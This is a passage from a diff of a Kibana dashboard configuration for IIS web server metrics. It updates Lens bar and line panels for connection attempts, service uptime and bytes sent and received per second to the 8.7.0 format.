"type": "custom" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": false - }, - "fillOpacity": 1.2, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": false - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "5838b61a-c214-4934-8c4b-de59fc13e6a0" - ], - "layerId": "abcf6552-9150-4c04-9dfb-d5be10c7210a", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "seriesType": "bar_horizontal", - "xAccessor": "32725ee9-9b18-4823-b660-266886bc1064", - "yConfig": [ - { - "axisMode": "left", - "color": "rgba(104,204,202,1)", - "forAccessor": "5838b61a-c214-4934-8c4b-de59fc13e6a0" - } - ] - } - ], - "legend": { - "isVisible": false, - "maxLines": 1, - "position": "right", - "shouldTruncate": true, - "showSingleSeries": false - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": false - }, - "valueLabels": "show" - } + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "iis.website.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "2d2eb68a-2e48-48b5-9059-b5f8d99b6f90": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "" + }, + "isBucketed": false, + "label": "Total Connection Attempts", + "operationType": "last_value", + "params": { + "showArrayValues": false, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.website.network.total_connection_attempts" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": false + }, + "fillOpacity": 1.2, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": false + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "2d2eb68a-2e48-48b5-9059-b5f8d99b6f90" + ], + "layerId": "81b4a03a-853e-48cb-b24e-c468ed7e9567", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 12, - "i": "ba537347-2422-4e09-931e-c0ff3ad24ca3", - "w": 13, - "x": 22, - "y": 0 - }, - "panelIndex": "ba537347-2422-4e09-931e-c0ff3ad24ca3", - "title": "Maximum Connections", - "type": "lens", - "version": "8.5.0" + "seriesType": "bar_horizontal", + "xAccessor": "0a04ece1-2036-410c-834e-11b02d1d4bd1", + "yConfig": [ + { + "axisMode": "left", + "color": "rgba(251,158,0,1)", + "forAccessor": "2d2eb68a-2e48-48b5-9059-b5f8d99b6f90" + } + ] + } + ], + "legend": { + "isVisible": false, + "maxLines": 1, + "position": "right", + "shouldTruncate": true, + "showSingleSeries": false + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": false + }, + "valueLabels": "show" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-81b4a03a-853e-48cb-b24e-c468ed7e9567", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "81b4a03a-853e-48cb-b24e-c468ed7e9567": { - "columnOrder": [ - "0a04ece1-2036-410c-834e-11b02d1d4bd1", - "2d2eb68a-2e48-48b5-9059-b5f8d99b6f90" - ], - "columns": { - "0a04ece1-2036-410c-834e-11b02d1d4bd1": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of iis.website.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderAgg": { - "customLabel": false, - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10 - }, - "scale": "ordinal", - "sourceField": "iis.website.name" - }, - "2d2eb68a-2e48-48b5-9059-b5f8d99b6f90": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "" - }, - "isBucketed": false, - "label": "Total Connection Attempts", - "operationType": "last_value", - "params": { - "showArrayValues": false, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.website.network.total_connection_attempts" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Total Connection Attempts" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 12, + "i": "7dbfdcf7-2742-4a48-8520-170afa068e2c", + "w": 9, + "x": 0, + "y": 12 + }, + "panelIndex": "7dbfdcf7-2742-4a48-8520-170afa068e2c", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-443aa393-cacd-4c30-bff3-34efb8d6f0d0", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "443aa393-cacd-4c30-bff3-34efb8d6f0d0": { + "columnOrder": [ + "f33f7d7b-0447-4e48-81e5-7c4bed2c9c8e", + "a928dc48-2f7e-49e9-a513-e7b125725d68", + "a928dc48-2f7e-49e9-a513-e7b125725d68X0", + "a928dc48-2f7e-49e9-a513-e7b125725d68X1" + ], + "columns": { + "a928dc48-2f7e-49e9-a513-e7b125725d68": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Service Uptime", + "operationType": "formula", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 2, + "suffix": " d" + } }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": false - }, - "fillOpacity": 1.2, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": false - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "2d2eb68a-2e48-48b5-9059-b5f8d99b6f90" - ], - "layerId": "81b4a03a-853e-48cb-b24e-c468ed7e9567", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "seriesType": "bar_horizontal", - "xAccessor": "0a04ece1-2036-410c-834e-11b02d1d4bd1", - "yConfig": [ - { - "axisMode": "left", - "color": "rgba(251,158,0,1)", - "forAccessor": "2d2eb68a-2e48-48b5-9059-b5f8d99b6f90" - } - ] - } - ], - "legend": { - "isVisible": false, - "maxLines": 1, - "position": "right", - "shouldTruncate": true, - "showSingleSeries": false - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": false - }, - "valueLabels": "show" - } + "formula": "last_value(iis.website.network.service_uptime)/86400", + "isFormulaBroken": false + }, + "references": [ + "a928dc48-2f7e-49e9-a513-e7b125725d68X1" + ], + "scale": "ratio" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 12, - "i": "3ca8af17-0bbf-4697-a193-6f0db4bfeeb8", - "w": 13, - "x": 35, - "y": 0 - }, - "panelIndex": "3ca8af17-0bbf-4697-a193-6f0db4bfeeb8", - "title": "Total Connection Attempts", - "type": "lens", - "version": "8.5.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-443aa393-cacd-4c30-bff3-34efb8d6f0d0", - "type": "index-pattern" + "a928dc48-2f7e-49e9-a513-e7b125725d68X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.website.network.service_uptime: *" + }, + "isBucketed": false, + "label": "Part of Service Uptime (Days)", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.website.network.service_uptime" + }, + "a928dc48-2f7e-49e9-a513-e7b125725d68X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Service Uptime (Days)", + "operationType": "math", + "params": { + "tinymathAst": { + "args": [ + "a928dc48-2f7e-49e9-a513-e7b125725d68X0", + 86400 + ], + "location": { + "max": 52, + "min": 0 + }, + "name": "divide", + "text": "last_value(iis.website.network.service_uptime)/86400", + "type": "function" } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "443aa393-cacd-4c30-bff3-34efb8d6f0d0": { - "columnOrder": [ - "f33f7d7b-0447-4e48-81e5-7c4bed2c9c8e", - "a928dc48-2f7e-49e9-a513-e7b125725d68", - "a928dc48-2f7e-49e9-a513-e7b125725d68X0", - "a928dc48-2f7e-49e9-a513-e7b125725d68X1" - ], - "columns": { - "a928dc48-2f7e-49e9-a513-e7b125725d68": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Service Uptime", - "operationType": "formula", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 2, - "suffix": " d" - } - }, - "formula": "last_value(iis.website.network.service_uptime)/86400", - "isFormulaBroken": false - }, - "references": [ - "a928dc48-2f7e-49e9-a513-e7b125725d68X1" - ], - "scale": "ratio" - }, - "a928dc48-2f7e-49e9-a513-e7b125725d68X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.website.network.service_uptime: *" - }, - "isBucketed": false, - "label": "Part of Service Uptime (Days)", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.website.network.service_uptime" - }, - "a928dc48-2f7e-49e9-a513-e7b125725d68X1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Service Uptime (Days)", - "operationType": "math", - "params": { - "tinymathAst": { - "args": [ - "a928dc48-2f7e-49e9-a513-e7b125725d68X0", - 86400 - ], - "location": { - "max": 52, - "min": 0 - }, - "name": "divide", - "text": "last_value(iis.website.network.service_uptime)/86400", - "type": "function" - } - }, - "references": [ - "a928dc48-2f7e-49e9-a513-e7b125725d68X0" - ], - "scale": "ratio" - }, - "f33f7d7b-0447-4e48-81e5-7c4bed2c9c8e": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of iis.website.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderAgg": { - "customLabel": false, - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10 - }, - "scale": "ordinal", - "sourceField": "iis.website.name" - } - }, - "incompleteColumns": {} - } - } - } + }, + "references": [ + "a928dc48-2f7e-49e9-a513-e7b125725d68X0" + ], + "scale": "ratio" + }, + "f33f7d7b-0447-4e48-81e5-7c4bed2c9c8e": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of iis.website.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderAgg": { + "customLabel": false, + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderBy": { + "type": "custom" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": false - }, - "fillOpacity": 1.2, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": false - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "a928dc48-2f7e-49e9-a513-e7b125725d68" - ], - "layerId": "443aa393-cacd-4c30-bff3-34efb8d6f0d0", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "seriesType": "bar_horizontal", - "xAccessor": "f33f7d7b-0447-4e48-81e5-7c4bed2c9c8e", - "yConfig": [ - { - "axisMode": "left", - "color": "rgba(211,49,21,1)", - "forAccessor": "a928dc48-2f7e-49e9-a513-e7b125725d68" - } - ] - } - ], - "legend": { - "isVisible": false, - "maxLines": 1, - "position": "right", - "shouldTruncate": true, - "showSingleSeries": false - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": false - }, - "valueLabels": "show" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "iis.website.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": false + }, + "fillOpacity": 1.2, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": false + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "a928dc48-2f7e-49e9-a513-e7b125725d68" + ], + "layerId": "443aa393-cacd-4c30-bff3-34efb8d6f0d0", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 12, - "i": "7dbfdcf7-2742-4a48-8520-170afa068e2c", - "w": 9, - "x": 0, - "y": 12 - }, - "panelIndex": "7dbfdcf7-2742-4a48-8520-170afa068e2c", - "title": "Service Uptime", - "type": "lens", - "version": "8.5.0" + "seriesType": "bar_horizontal", + "xAccessor": "f33f7d7b-0447-4e48-81e5-7c4bed2c9c8e", + "yConfig": [ + { + "axisMode": "left", + "color": "rgba(211,49,21,1)", + "forAccessor": "a928dc48-2f7e-49e9-a513-e7b125725d68" + } + ] + } + ], + "legend": { + "isVisible": false, + "maxLines": 1, + "position": "right", + "shouldTruncate": true, + "showSingleSeries": false + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": false + }, + "valueLabels": "show" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-be28c427-cf5a-425d-95cb-16181c22def6", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Service Uptime" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 12, + "i": "5c01ce6f-2b93-439a-b5a0-d911da07af9b", + "w": 20, + "x": 9, + "y": 12 + }, + "panelIndex": "5c01ce6f-2b93-439a-b5a0-d911da07af9b", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-be28c427-cf5a-425d-95cb-16181c22def6", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "be28c427-cf5a-425d-95cb-16181c22def6": { + "columnOrder": [ + "eee6653d-397c-4629-a690-4dd9c3650854", + "1ffa28f7-e90c-4c60-8fb3-80aac563db8c", + "06cdc211-50f4-4a99-ad34-2576c3421f8c" + ], + "columns": { + "06cdc211-50f4-4a99-ad34-2576c3421f8c": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Bytes Sent", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "bytes", + "params": { + "decimals": 1, + "suffix": "/s" + } } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "be28c427-cf5a-425d-95cb-16181c22def6": { - "columnOrder": [ - "eee6653d-397c-4629-a690-4dd9c3650854", - "1ffa28f7-e90c-4c60-8fb3-80aac563db8c", - "06cdc211-50f4-4a99-ad34-2576c3421f8c" - ], - "columns": { - "06cdc211-50f4-4a99-ad34-2576c3421f8c": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Bytes Sent", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "bytes", - "params": { - "decimals": 1, - "suffix": "/s" - } - } - }, - "scale": "ratio", - "sourceField": "iis.website.network.bytes_sent_per_sec" - }, - "1ffa28f7-e90c-4c60-8fb3-80aac563db8c": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "eee6653d-397c-4629-a690-4dd9c3650854": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of iis.website.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderAgg": { - "customLabel": false, - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10 - }, - "scale": "ordinal", - "sourceField": "iis.website.name" - } - }, - "incompleteColumns": {} - } - } - } + }, + "scale": "ratio", + "sourceField": "iis.website.network.bytes_sent_per_sec" + }, + "1ffa28f7-e90c-4c60-8fb3-80aac563db8c": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "eee6653d-397c-4629-a690-4dd9c3650854": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of iis.website.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderAgg": { + "customLabel": false, + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderBy": { + "type": "custom" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "fillOpacity": 0, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "06cdc211-50f4-4a99-ad34-2576c3421f8c" - ], - "layerId": "be28c427-cf5a-425d-95cb-16181c22def6", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "seriesType": "line", - "splitAccessor": "eee6653d-397c-4629-a690-4dd9c3650854", - "xAccessor": "1ffa28f7-e90c-4c60-8fb3-80aac563db8c", - "yConfig": [ - { - "axisMode": "left", - "color": "rgba(252,196,0,1)", - "forAccessor": "06cdc211-50f4-4a99-ad34-2576c3421f8c" - } - ] - } - ], - "legend": { - "isVisible": true, - "maxLines": 1, - "position": "right", - "shouldTruncate": true, - "showSingleSeries": true - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true, - "yLeftExtent": { - "mode": "full" - }, - "yLeftScale": "linear", - "yRightExtent": { - "mode": "full" - }, - "yRightScale": "linear", - "yTitle": "" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "iis.website.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "fillOpacity": 0, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "06cdc211-50f4-4a99-ad34-2576c3421f8c" + ], + "layerId": "be28c427-cf5a-425d-95cb-16181c22def6", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 12, - "i": "5c01ce6f-2b93-439a-b5a0-d911da07af9b", - "w": 20, - "x": 9, - "y": 12 - }, - "panelIndex": "5c01ce6f-2b93-439a-b5a0-d911da07af9b", - "title": "Bytes Sent/sec", - "type": "lens", - "version": "8.5.0" + "seriesType": "line", + "splitAccessor": "eee6653d-397c-4629-a690-4dd9c3650854", + "xAccessor": "1ffa28f7-e90c-4c60-8fb3-80aac563db8c", + "yConfig": [ + { + "axisMode": "left", + "color": "rgba(252,196,0,1)", + "forAccessor": "06cdc211-50f4-4a99-ad34-2576c3421f8c" + } + ] + } + ], + "legend": { + "isVisible": true, + "maxLines": 1, + "position": "right", + "shouldTruncate": true, + "showSingleSeries": true + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true, + "yLeftExtent": { + "mode": "full" + }, + "yLeftScale": "linear", + "yRightExtent": { + "mode": "full" + }, + "yRightScale": "linear", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-1479d23f-c6ca-4248-857a-3f81f884e0b2", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Bytes Sent/sec" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 12, + "i": "6bac7104-6ff4-480a-9987-ce2e92628053", + "w": 19, + "x": 29, + "y": 12 + }, + "panelIndex": "6bac7104-6ff4-480a-9987-ce2e92628053", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-1479d23f-c6ca-4248-857a-3f81f884e0b2", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "1479d23f-c6ca-4248-857a-3f81f884e0b2": { + "columnOrder": [ + "479fac87-32a3-44f8-852e-69aa14eb5d13", + "33b8cb6d-6b7a-4b6d-b05f-2262e61b2881", + "35da7e3b-471c-4f76-ab90-03c78193bd02" + ], + "columns": { + "33b8cb6d-6b7a-4b6d-b05f-2262e61b2881": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "35da7e3b-471c-4f76-ab90-03c78193bd02": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Bytes Received", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "bytes", + "params": { + "decimals": 1, + "suffix": "/s" + } } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "1479d23f-c6ca-4248-857a-3f81f884e0b2": { - "columnOrder": [ - "479fac87-32a3-44f8-852e-69aa14eb5d13", - "33b8cb6d-6b7a-4b6d-b05f-2262e61b2881", - "35da7e3b-471c-4f76-ab90-03c78193bd02" - ], - "columns": { - "33b8cb6d-6b7a-4b6d-b05f-2262e61b2881": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "35da7e3b-471c-4f76-ab90-03c78193bd02": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Bytes Received", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "bytes", - "params": { - "decimals": 1, - "suffix": "/s" - } - } - }, - "scale": "ratio", - "sourceField": "iis.website.network.bytes_received_per_sec" - }, - "479fac87-32a3-44f8-852e-69aa14eb5d13": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of iis.website.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderAgg": { - "customLabel": false, - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10 - }, - "scale": "ordinal", - "sourceField": "iis.website.name" - } - }, - "incompleteColumns": {} - } - } - } + }, + "scale": "ratio", + "sourceField": "iis.website.network.bytes_received_per_sec" + }, + "479fac87-32a3-44f8-852e-69aa14eb5d13": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of iis.website.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderAgg": { + "customLabel": false, + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderBy": { + "type": "custom" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "fillOpacity": 0, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "35da7e3b-471c-4f76-ab90-03c78193bd02" - ], - "layerId": "1479d23f-c6ca-4248-857a-3f81f884e0b2", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "seriesType": "line", - "splitAccessor": "479fac87-32a3-44f8-852e-69aa14eb5d13", - "xAccessor": "33b8cb6d-6b7a-4b6d-b05f-2262e61b2881", - "yConfig": [ - { - "axisMode": "left", - "color": "rgba(252,196,0,1)", - "forAccessor": "35da7e3b-471c-4f76-ab90-03c78193bd02" - } - ] - } - ], - "legend": { - "isVisible": true, - "maxLines": 1, - "position": "right", - "shouldTruncate": true, - "showSingleSeries": true - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true, - "yLeftExtent": { - "mode": "full" - }, - "yLeftScale": "linear", - "yRightExtent": { - "mode": "full" - }, - "yRightScale": "linear", - "yTitle": "" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "iis.website.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "fillOpacity": 0, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "35da7e3b-471c-4f76-ab90-03c78193bd02" + ], + "layerId": "1479d23f-c6ca-4248-857a-3f81f884e0b2", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 12, - "i": "6bac7104-6ff4-480a-9987-ce2e92628053", - "w": 19, - "x": 29, - "y": 12 - }, - "panelIndex": "6bac7104-6ff4-480a-9987-ce2e92628053", - "title": "Bytes Received/sec", - "type": "lens", - "version": "8.5.0" + "seriesType": "line", + "splitAccessor": "479fac87-32a3-44f8-852e-69aa14eb5d13", + "xAccessor": "33b8cb6d-6b7a-4b6d-b05f-2262e61b2881", + "yConfig": [ + { + "axisMode": "left", + "color": "rgba(252,196,0,1)", + "forAccessor": "35da7e3b-471c-4f76-ab90-03c78193bd02" + } + ] + } + ], + "legend": { + "isVisible": true, + "maxLines": 1, + "position": "right", + "shouldTruncate": true, + "showSingleSeries": true + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true, + "yLeftExtent": { + "mode": "full" + }, + "yLeftScale": "linear", + "yRightExtent": { + "mode": "full" + }, + "yRightScale": "linear", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-03f125d4-c99c-460e-bc11-be08f9294423", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "03f125d4-c99c-460e-bc11-be08f9294423": { - "columnOrder": [ - "4100a38e-ea34-4a66-ad4a-8abdf8d3d8a3", - "451975f8-afff-4a05-befc-dbeb807a5ad0", - "c08ed31d-564a-4dac-b8dd-c5d9141f7c88" - ], - "columns": { - "4100a38e-ea34-4a66-ad4a-8abdf8d3d8a3": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of iis.website.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderAgg": { - "customLabel": false, - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, 